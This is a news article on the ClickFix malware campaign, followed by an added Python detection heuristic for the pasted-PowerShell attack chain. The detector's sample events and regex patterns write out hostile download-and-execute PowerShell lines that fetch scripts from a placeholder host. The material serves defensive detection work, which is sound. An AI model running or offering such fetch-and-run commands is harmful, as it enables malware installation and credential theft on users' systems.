June 18, 2024 By Judy Sanhz

Hackers have devised a new, deceptive method to trick users into installing malware named ClickFix, according to cybersecurity firm Proofpoint. The scheme entices users with fake solutions to common errors in popular services such as Chrome, OneDrive, and Microsoft. Once users download and execute these “fixes” by clicking the Copy fix button, they unwittingly run a PowerShell command or a Windows Run dialogue command that compromises their systems.
This command installs a “root certificate” to flush the DNS cache, clear the clipboard contents, show a fake message, and install an additional remote PowerShell script that performs an anti-VM check before the info-stealer is installed. Various hacker groups, including those responsible for ClearFake, allegedly use this method. Proofpoint details how hackers exploit compromised sites by incorporating a malicious script served by Binance’s Smart Chain contract on the blockchain to spread malware and infect susceptible Windows computers.
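
A defender-side heuristic for the chain described above, as an added example that is not Proofpoint's detection logic or code from the original article: it flags shell processes started from explorer.exe whose command line combines at least two of the listed behaviours. The regexes, the two-indicator threshold and the sample process events are constructed assumptions.

```python
import re

# Behaviours the article attributes to the pasted "fix" command. The regexes
# are assumptions about how each one typically shows up in a command line.
INDICATORS = {
    "dns_flush": re.compile(r"ipconfig(?:\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard|Clipboard\]::Clear|\|\s*clip(?:\.exe)?\b", re.I),
    "remote_script": re.compile(
        r"\b(?:iex|Invoke-Expression)\b.*\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b"
        r"|\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b.*\|\s*(?:iex|Invoke-Expression)\b",
        re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed process-creation events (not taken from any real incident).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "ipconfig /flushdns; Set-Clipboard -Value $null; iex (iwr https://example.invalid/a.ps1)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "ipconfig /flushdns"'},
    {"parent": r"C:\Program Files\Agent\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "Clear-DnsClientCache; irm https://example.invalid/cfg.ps1 | iex"'},
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def matched_indicators(cmdline):
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_suspicious(event):
    # Commands typed or pasted into the Run dialog start as children of explorer.exe.
    interactive = basename(event["parent"]) == "explorer.exe"
    shell = basename(event["image"]) in SHELLS
    return interactive and shell and len(matched_indicators(event["cmdline"])) >= 2

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), matched_indicators(ev["cmdline"]))
```

A single indicator, such as a user flushing DNS by hand, stays below the threshold; in practice the rule would be tuned against the environment's own process telemetry.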